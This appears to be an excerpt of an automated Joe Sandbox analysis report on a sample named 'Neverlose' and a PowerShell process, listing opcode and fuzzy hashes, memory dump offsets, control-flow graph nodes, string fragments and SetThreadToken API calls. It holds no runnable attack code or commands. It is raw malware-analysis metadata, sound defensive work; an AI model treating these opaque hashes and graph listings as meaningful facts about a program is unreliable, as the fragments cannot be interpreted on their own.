                                                                • Opcode ID: b65c2c11c2d8f1c7dfa42360b2f60060ce8e0f86b80d0e5dcaf88ddbe0fd68df
                                                                • Instruction ID: 0b3e93dddf89485f902728db364bd5a4af58e28f631d5dde9dfbdb9f0dd2051b
                                                                • Opcode Fuzzy Hash: b65c2c11c2d8f1c7dfa42360b2f60060ce8e0f86b80d0e5dcaf88ddbe0fd68df
                                                                • Instruction Fuzzy Hash: F901D4B7B401546FCB569E68A810BEF3BA7DBC9360F18C06AF505D7280DA31C811AB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f137f35cd0f0a7fbbe6f49e0f8f3cb5520dab132df91a904e755d9aeda67478
                                                                • Instruction ID: 41ee8c13bf7f40e2fe2140c6a0408d34210c9ae416cfa9c4a6fee19808761e8b
                                                                • Opcode Fuzzy Hash: 2f137f35cd0f0a7fbbe6f49e0f8f3cb5520dab132df91a904e755d9aeda67478
                                                                • Instruction Fuzzy Hash: 2101D4317042154BCB15A778E8107AE77A7DBC4B14F004579D54A6B390DEBAAC4687E3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad3156c0bb94776973d977c9f5e29249c6339b9f720b161cfb58aaf88492d7d6
                                                                • Instruction ID: 7b5a726d51acd11b9809267c9c3b7111f4841b3d725b40745f6201e8d08f37cc
                                                                • Opcode Fuzzy Hash: ad3156c0bb94776973d977c9f5e29249c6339b9f720b161cfb58aaf88492d7d6
                                                                • Instruction Fuzzy Hash: E2118830A85205DFDB14EB70D955B6E7BB2AF40315F20DA28D416DB2D1EFB19D06CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 059cb6449476387df7ceb41179e5e86b33f786bbd46820a58f3f1cecade9aa90
                                                                • Instruction ID: 78ffe77e93a97f9e877cdeb0851fa3aca9d49f45495c47617de81948750cfa48
                                                                • Opcode Fuzzy Hash: 059cb6449476387df7ceb41179e5e86b33f786bbd46820a58f3f1cecade9aa90
                                                                • Instruction Fuzzy Hash: BE018430904249DFCB11DB74EA40A5EBFB2EF44300F2085F8C40897365DA395E49DB92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a2bfd29842bc030a2fc77ab805c2b88c89dd5a5dafb79d785e1910c6de4671ab
                                                                • Instruction ID: 15b32f79ada330e528af193a461379e28b85093c5c5cf837deb931ea82300980
                                                                • Opcode Fuzzy Hash: a2bfd29842bc030a2fc77ab805c2b88c89dd5a5dafb79d785e1910c6de4671ab
                                                                • Instruction Fuzzy Hash: FFF0AC7288C3464EDB108774D8127EB7F348B42224F249566C0189E1C1EB74450AC771
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e55f2f2c71021f773ce17da140050aa9c2274e84621a18d2bbce99ada53cc531
                                                                • Instruction ID: 48de004aaef2ce79721bc8def67f2fa53428b3484533ad67bfc520ded778a892
                                                                • Opcode Fuzzy Hash: e55f2f2c71021f773ce17da140050aa9c2274e84621a18d2bbce99ada53cc531
                                                                • Instruction Fuzzy Hash: 2D01F430904209DFCB14DF78EA40A5EBFB6EB84700F2085B8D40857365DB365E49DBD1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e20ca01df2e2946601dfba4fadb6962e522f1d2b842bff0a907fb4041b50a895
                                                                • Instruction ID: 8c4532eeb71c15568cd970ff04a4c8f9b984e03f29f9ce72e0d955df8183f6ce
                                                                • Opcode Fuzzy Hash: e20ca01df2e2946601dfba4fadb6962e522f1d2b842bff0a907fb4041b50a895
                                                                • Instruction Fuzzy Hash: F8D02B20B4530947EF2923B4940872C3A8C9F80729F010726A11AD11D1DF38E4104192
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20adb60992ae6f5fffe9b8cb652ff1a918784ba2f4da8f8fc40597f69c27aa9f
                                                                • Instruction ID: 869705204e4234c936ebfbac978d6fb308f6af43316a791b27abb7b75ca81fa5
                                                                • Opcode Fuzzy Hash: 20adb60992ae6f5fffe9b8cb652ff1a918784ba2f4da8f8fc40597f69c27aa9f
                                                                • Instruction Fuzzy Hash: 5FE086309C520ACBEB14AF70D5197AF7A61AF40314F20DB25D416ED2D0EFB08A06CE61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd4625c08060588d5934cd51bed891dff5ea2fbf329ca82db7bd53ec3d7d0a6e
                                                                • Instruction ID: 952dd3b4652609933d96beaee7853101452ee872cec7a97ba8773484b3820430
                                                                • Opcode Fuzzy Hash: fd4625c08060588d5934cd51bed891dff5ea2fbf329ca82db7bd53ec3d7d0a6e
                                                                • Instruction Fuzzy Hash: 55E086309C120A8BEB14AF70D5197AF7A61AF40314F209B24D416D91D0EFB08A06CE50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56c5db9e0ac5a7d32d67fee71e7c04ae38bc41baa78cc7ffb4f4b57e8ccbf540
                                                                • Instruction ID: 4df831eda1438c716c3b4b1171da21e6ba6e70ff5090ee7327e77975754e18e8
                                                                • Opcode Fuzzy Hash: 56c5db9e0ac5a7d32d67fee71e7c04ae38bc41baa78cc7ffb4f4b57e8ccbf540
                                                                • Instruction Fuzzy Hash: E1D02BB28486801ECB229330EC957D87F16DF81214F25C270E84146167CA7D898E8B80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c49f9daff1952bb0acea8d7ac1fca843784a0dbf052053e6967e9b356eec121b
                                                                • Instruction ID: edcef2fc62b845ec32c3ae0fbce20dd80123aacce6aa3567271ea34fbdc60667
                                                                • Opcode Fuzzy Hash: c49f9daff1952bb0acea8d7ac1fca843784a0dbf052053e6967e9b356eec121b
                                                                • Instruction Fuzzy Hash: DBC01231B8030A87EF3C67F5E01C76D3A9D5FC0919B011929E24BD1141EF38E52045E2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61c8b0a64fd98cb2f3d140d9903fc4aab474f565e27651c98e1e38c9dd25cb10
                                                                • Instruction ID: 6c1b7dbe61f3110f4bd309c3ddc5c3c6dc9f0d1d7d83af6c133aa0eaafd9e184
                                                                • Opcode Fuzzy Hash: 61c8b0a64fd98cb2f3d140d9903fc4aab474f565e27651c98e1e38c9dd25cb10
                                                                • Instruction Fuzzy Hash: BAC012704482495ECA21E775F9449957B5EEBC02047509630E40506229DF7D9DCD4694
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmp, Offset: 01008000, based on PE: true
                                                                • Associated: 00000000.00000002.1727100048.0000000001149000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1727100048.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ff0000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c47ce1ddd9cb1132b0afcd45080238c39c69e70dd9b226b0964dcbea2758502b
                                                                • Instruction ID: 73574f7ffa625c95c0251173173dc9f1a6719fc18ea652f1802ea11f7ec39a43
                                                                • Opcode Fuzzy Hash: c47ce1ddd9cb1132b0afcd45080238c39c69e70dd9b226b0964dcbea2758502b
                                                                • Instruction Fuzzy Hash: 3DE1E6B680D7E05FD7534B78C8621957FB4BF2B32871985DAC5C48E263F22A9907C782

                                                                Execution Graph

                                                                Execution Coverage:6.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 22068 8f96428 22069 8f9646b SetThreadToken 22068->22069 22070 8f96499 22069->22070

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 758 4f6b470-4f6b4a9 760 4f6b4ae-4f6b7e9 call 4f6acbc 758->760 761 4f6b4ab 758->761 822 4f6b7ee-4f6b7f5 760->822 761->760
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fe08af2841c832a680302505b5d9f0bbcdc7ea61a1948b9bd3b05a60991857f
                                                                • Instruction ID: 6c0c216ea64c5413b4ebcfd78a3e80a7df036fe552df9ddc407a86bab17cd94b
                                                                • Opcode Fuzzy Hash: 4fe08af2841c832a680302505b5d9f0bbcdc7ea61a1948b9bd3b05a60991857f
                                                                • Instruction Fuzzy Hash: 7C9173B1B007185BDB1AEFB4C4146AEB7E2EF84604B10892DD54AAF344DF74AD068BD6

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 823 4f6b490-4f6b4a9 824 4f6b4ae-4f6b7e9 call 4f6acbc 823->824 825 4f6b4ab 823->825 886 4f6b7ee-4f6b7f5 824->886 825->824
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60f8483d28c411df96450d5a08deb18580d3a10d8f37094e5aeaa0dd718dad56
                                                                • Instruction ID: 399f1a5809d445dd733de005aaec4747091bf09014c840fdcc689035e7e5db28
                                                                • Opcode Fuzzy Hash: 60f8483d28c411df96450d5a08deb18580d3a10d8f37094e5aeaa0dd718dad56
                                                                • Instruction Fuzzy Hash: 97916FB1F007185BDB1AEBB4C4146AEB7E2EF84604B10892DD54AAB344DF74AD068BD6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$JGl$JGl$JGl$JGl$JGl$JGl$rFl$rFl
                                                                • API String ID: 0-3436028847
                                                                • Opcode ID: fdbc1523c6df33fdcaed856cc94ec030f730740c0a0f5ce39096b7ef4c9dde04
                                                                • Instruction ID: 797fea7340e1629d8dfc20fa845857c1564752eb657ba318cbd1dcc0194e1f55
                                                                • Opcode Fuzzy Hash: fdbc1523c6df33fdcaed856cc94ec030f730740c0a0f5ce39096b7ef4c9dde04
                                                                • Instruction Fuzzy Hash: 01226DB1B0522ADFCB14DB789401BAABBE9BF85310F15907AD605CF251DB31CC86D7A1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 206 4f6eb70-4f6eb83 208 4f6eb85-4f6eb9e call 4f6eac8 206->208 209 4f6eba3-4f6ebb6 206->209 218 4f6ed34-4f6ed37 208->218 215 4f6ebf4-4f6ebfd 209->215 216 4f6ebb8-4f6ebd0 209->216 221 4f6ec06-4f6ec12 215->221 222 4f6ebff-4f6ec01 215->222 216->215 225 4f6ebd2-4f6ebe0 216->225 226 4f6ec14-4f6ec16 221->226 227 4f6ec1b-4f6ec27 221->227 222->218 230 4f6ebe6-4f6ebef 225->230 231 4f6ed38-4f6ed73 225->231 226->218 232 4f6ec30-4f6ec45 227->232 233 4f6ec29-4f6ec2b 227->233 230->218 239 4f6ed75-4f6eda0 231->239 240 4f6eda1-4f6eda9 231->240 241 4f6ec47-4f6ec49 232->241 242 4f6ec4e-4f6ec65 232->242 233->218 243 4f6edae-4f6edc5 240->243 241->218 250 4f6ec76-4f6ec82 242->250 251 4f6ec67-4f6ec71 242->251 255 4f6ec84-4f6ec8e 250->255 256 4f6ec93-4f6ec9f 250->256 251->218 255->218 259 4f6ecb0-4f6ecbc 256->259 260 4f6eca1-4f6ecab 256->260 263 4f6ecbe-4f6ecc8 259->263 264 4f6ecca-4f6ecd6 259->264 260->218 263->218 267 4f6ece4-4f6ecf0 264->267 268 4f6ecd8-4f6ece2 264->268 271 4f6ecf2-4f6ecfc 267->271 272 4f6ecfe-4f6ed0a 267->272 268->218 271->218 275 4f6ed0c-4f6ed16 272->275 276 4f6ed18-4f6ed24 272->276 275->218 279 4f6ed26-4f6ed30 276->279 280 4f6ed32 276->280 279->218 280->218
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-13851718
                                                                • Opcode ID: 34fc4e00f4b07573a9d81876912a6af9ce763a597d8137700e240c11bc318c2b
                                                                • Instruction ID: 5fb613aeab30e0729f8ad96e940582a1d6505a2dc468767714f50205dcea7612
                                                                • Opcode Fuzzy Hash: 34fc4e00f4b07573a9d81876912a6af9ce763a597d8137700e240c11bc318c2b
                                                                • Instruction Fuzzy Hash: C861823A7841548FCB29DB79C55482D7BE2AF8971031048ADD047CF3A5EE2AEC43CB62

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 282 7e23ce8-7e23d0d 283 7e23d13-7e23d18 282->283 284 7e23f00-7e23f16 282->284 285 7e23d30-7e23d34 283->285 286 7e23d1a-7e23d20 283->286 292 7e23f18-7e23f1d 284->292 293 7e23f1f-7e23f4a 284->293 290 7e23eb0-7e23eba 285->290 291 7e23d3a-7e23d3c 285->291 288 7e23d22 286->288 289 7e23d24-7e23d2e 286->289 288->285 289->285 294 7e23ec8-7e23ece 290->294 295 7e23ebc-7e23ec5 290->295 296 7e23d3e-7e23d4a 291->296 297 7e23d4c 291->297 292->293 298 7e23f50-7e23f55 293->298 299 7e240ce-7e240de 293->299 300 7e23ed0-7e23ed2 294->300 301 7e23ed4-7e23ee0 294->301 303 7e23d4e-7e23d50 296->303 297->303 304 7e23f57-7e23f5d 298->304 305 7e23f6d-7e23f71 298->305 315 7e240e0-7e240e5 299->315 316 7e240e7-7e24112 299->316 306 7e23ee2-7e23efd 300->306 301->306 303->290 307 7e23d56-7e23d75 303->307 308 7e23f61-7e23f6b 304->308 309 7e23f5f 304->309 312 7e24080-7e2408a 305->312 313 7e23f77-7e23f79 305->313 337 7e23d77-7e23d83 307->337 338 7e23d85 307->338 308->305 309->305 317 7e24097-7e2409d 312->317 318 7e2408c-7e24094 312->318 319 7e23f7b-7e23f87 313->319 320 7e23f89 313->320 315->316 326 7e24228-7e2425d 316->326 327 7e24118-7e2411d 316->327 323 7e240a3-7e240af 317->323 324 7e2409f-7e240a1 317->324 322 7e23f8b-7e23f8d 319->322 320->322 322->312 331 7e23f93-7e23fb2 322->331 332 7e240b1-7e240cb 323->332 324->332 347 7e2428b-7e24295 326->347 348 7e2425f-7e24281 326->348 328 7e24135-7e24139 327->328 329 7e2411f-7e24125 327->329 339 7e241da-7e241e4 328->339 340 7e2413f-7e24141 328->340 334 7e24127 329->334 335 7e24129-7e24133 329->335 367 7e23fc2 331->367 368 7e23fb4-7e23fc0 331->368 334->328 335->328 343 7e23d87-7e23d89 337->343 338->343 349 7e241f1-7e241f7 339->349 350 7e241e6-7e241ee 339->350 344 7e24143-7e2414f 340->344 345 7e24151 340->345 343->290 352 7e23d8f-7e23d96 343->352 353 7e24153-7e24155 344->353 345->353 356 7e24297-7e2429c 347->356 357 7e2429f-7e242a5 347->357 390 7e24283-7e24288 348->390 391 7e242d5-7e242fe 348->391 354 7e241f9-7e241fb 349->354 355 7e241fd-7e24209 349->355 352->284 361 7e23d9c-7e23da1 352->361 353->339 364 7e2415b-7e2415d 353->364 365 7e2420b-7e24225 354->365 355->365 358 7e242a7-7e242a9 357->358 359 7e242ab-7e242b7 357->359 366 7e242b9-7e242d2 358->366 359->366 369 7e23da3-7e23da9 361->369 370 7e23db9-7e23dc8 361->370 371 7e24177-7e2417e 364->371 372 7e2415f-7e24165 364->372 378 7e23fc4-7e23fc6 367->378 368->378 379 7e23dab 369->379 380 7e23dad-7e23db7 369->380 370->290 392 7e23dce-7e23dec 370->392 375 7e24180-7e24186 371->375 376 7e24196-7e241d7 371->376 382 7e24167 372->382 383 7e24169-7e24175 372->383 385 7e2418a-7e24194 375->385 386 7e24188 375->386 378->312 389 7e23fcc-7e24003 378->389 379->370 380->370 382->371 383->371 385->376 386->376 409 7e24005-7e2400b 389->409 410 7e2401d-7e24024 389->410 404 7e24300-7e24326 391->404 405 7e2432d-7e2433e 391->405 392->290 407 7e23df2-7e23e17 392->407 404->405 416 7e24340-7e24346 405->416 417 7e24347-7e24348 405->417 407->290 432 7e23e1d-7e23e24 407->432 412 7e2400f-7e2401b 409->412 413 7e2400d 409->413 414 7e24026-7e2402c 410->414 415 7e2403c-7e2407d 410->415 412->410 413->410 420 7e24030-7e2403a 414->420 421 7e2402e 414->421 416->417 422 7e24382-7e2438f 417->422 423 7e2434a-7e2435c 417->423 420->415 421->415 426 7e24395-7e2439f 422->426 423->426 427 7e2435e-7e2437b 423->427 429 7e243a1-7e243a5 426->429 430 7e243a8-7e243ae 426->430 439 7e243e5-7e243ea 427->439 440 7e2437d-7e24380 427->440 433 7e243b0-7e243b2 430->433 434 7e243b4-7e243c0 430->434 436 7e23e26-7e23e41 432->436 437 7e23e6a-7e23e9d 432->437 438 7e243c2-7e243e2 433->438 434->438 446 7e23e43-7e23e49 436->446 447 7e23e5b-7e23e5f 436->447 454 7e23ea4-7e23ead 437->454 439->440 440->422 448 7e23e4b 446->448 449 7e23e4d-7e23e59 446->449 451 7e23e66-7e23e68 447->451 448->447 449->447 451->454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                • API String ID: 0-1420252700
                                                                • Opcode ID: 873d7b2def7bbc1098f7d4fea0e01bd5cff91abd4e800d0ff5fe3daa7d8eb763
                                                                • Instruction ID: 5b47df806bb81a3e597bb5694a9f48be5225a5d551af55f9c1273dd645eddd87
                                                                • Opcode Fuzzy Hash: 873d7b2def7bbc1098f7d4fea0e01bd5cff91abd4e800d0ff5fe3daa7d8eb763
                                                                • Instruction Fuzzy Hash: 85129BB1B053A58FCB158B699811EAABFA2AFC2314F14907BD401CF691DB31DCC6C7A1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 459 8f96420-8f96463 461 8f9646b-8f96497 SetThreadToken 459->461 462 8f96499-8f9649f 461->462 463 8f964a0-8f964bd 461->463 462->463
                                                                APIs
                                                                • SetThreadToken.KERNELBASE(?,F2DC07CD), ref: 08F9648A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1718720173.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ThreadToken
                                                                • String ID:
                                                                • API String ID: 3254676861-0
                                                                • Opcode ID: ab0a7b43f70af7fbb074d317526cafaa16826c0ea018d16b6f82d9b6dc2f4f61
                                                                • Instruction ID: bef4048a62be6b7c93183304d21ac3194eaf8dff906860bc978d182252e07ba5
                                                                • Opcode Fuzzy Hash: ab0a7b43f70af7fbb074d317526cafaa16826c0ea018d16b6f82d9b6dc2f4f61
                                                                • Instruction Fuzzy Hash: 7D1116B59003088FDB10DFAAD544BDEFBF4AF48324F248419D458A7710C775A944CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 466 8f96428-8f96497 SetThreadToken 468 8f96499-8f9649f 466->468 469 8f964a0-8f964bd 466->469 468->469
                                                                APIs
                                                                • SetThreadToken.KERNELBASE(?,F2DC07CD), ref: 08F9648A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1718720173.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ThreadToken
                                                                • String ID:
                                                                • API String ID: 3254676861-0
                                                                • Opcode ID: 267a8fd57efdf1ea7b0c7bcb3cdb0edd958549be1d66cda88589cabd4cc14574
                                                                • Instruction ID: 78482059f8d20c6f5d45654a4646772e2860fb012acf4a173c291f67d781c96f
                                                                • Opcode Fuzzy Hash: 267a8fd57efdf1ea7b0c7bcb3cdb0edd958549be1d66cda88589cabd4cc14574
                                                                • Instruction Fuzzy Hash: 3411F5B59003488FDB10DF9AC544B9EFBF8EB48324F248419D458A7310D779A944CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 472 4f66fe0-4f66fff 473 4f67105-4f67143 472->473 474 4f67005-4f67008 472->474 501 4f6700a call 4f67697 474->501 502 4f6700a call 4f6767c 474->502 476 4f67010-4f67022 477 4f67024 476->477 478 4f6702e-4f67043 476->478 477->478 484 4f670ce-4f670e7 478->484 485 4f67049-4f67059 478->485 490 4f670f2 484->490 491 4f670e9 484->491 486 4f67065-4f67073 call 4f6bf10 485->486 487 4f6705b 485->487 493 4f67079-4f6707d 486->493 487->486 490->473 491->490 494 4f6707f-4f6708f 493->494 495 4f670bd-4f670c8 493->495 496 4f67091-4f670a9 494->496 497 4f670ab-4f670b5 494->497 495->484 495->485 496->495 497->495 501->476 502->476
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 750c3f208c8abc1634d6be424916eebd273c02b9e983e972459d16747127b468
                                                                • Instruction ID: 63f2b740e792dc56cf9544d228deec93ea4636ea5ebc243c4f0c235fcb55562c
                                                                • Opcode Fuzzy Hash: 750c3f208c8abc1634d6be424916eebd273c02b9e983e972459d16747127b468
                                                                • Instruction Fuzzy Hash: EC415134B042049FDB04EFA8C454AAEBBF1EF8D715F244459E402AB395DB36EC02CB60

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 503 4f6e580-4f6e61e 511 4f6e624-4f6e63b 503->511 512 4f6e6a2-4f6e6bb 503->512 517 4f6e643-4f6e6a0 511->517 515 4f6e6c6 512->515 516 4f6e6bd 512->516 518 4f6e6c7 515->518 516->515 517->511 517->512 518->518
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JGl
                                                                • API String ID: 0-2909732305
                                                                • Opcode ID: 8cb378f3f57730ed4e77e6118b29d9e6fbf05ceab0837a2e7b0af74c00b36957
                                                                • Instruction ID: 543ffcee00b367b5ee2f42295cd0ee4c9b02f636283d344ba383e4b6baf7aebe
                                                                • Opcode Fuzzy Hash: 8cb378f3f57730ed4e77e6118b29d9e6fbf05ceab0837a2e7b0af74c00b36957
                                                                • Instruction Fuzzy Hash: A741DD75A003099FCB11DF78D954A9DBBF1FF49304F1086A9D406AB3A5CB31AC0ACBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 526 4f6e5a8-4f6e61e 533 4f6e624-4f6e63b 526->533 534 4f6e6a2-4f6e6bb 526->534 539 4f6e643-4f6e6a0 533->539 537 4f6e6c6 534->537 538 4f6e6bd 534->538 540 4f6e6c7 537->540 538->537 539->533 539->534 540->540
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JGl
                                                                • API String ID: 0-2909732305
                                                                • Opcode ID: 03d915ad31610f3e20535cee1d8f76731164a2efa55151b9e3ea9886377c3eb0
                                                                • Instruction ID: 3cb430c33ea4d0877ec5b8942018db3da1981c49915ad713d141bebd711435b6
                                                                • Opcode Fuzzy Hash: 03d915ad31610f3e20535cee1d8f76731164a2efa55151b9e3ea9886377c3eb0
                                                                • Instruction Fuzzy Hash: 3A315C75A00205DFCB14DF69D654A9EBBF2FF88304F108669D406A7394DB31BD45CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 548 4f6af98-4f6afa1 call 4f6a984 550 4f6afa6-4f6afaa 548->550 551 4f6afac-4f6afb9 550->551 552 4f6afba-4f6b055 550->552 558 4f6b057-4f6b05d 552->558 559 4f6b05e-4f6b07b 552->559 558->559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (&^q
                                                                • API String ID: 0-2067289071
                                                                • Opcode ID: 50ddeb87d77cf6d19400d694ce9548c14ed51bb4a2cfe442c8ff93775428ae63
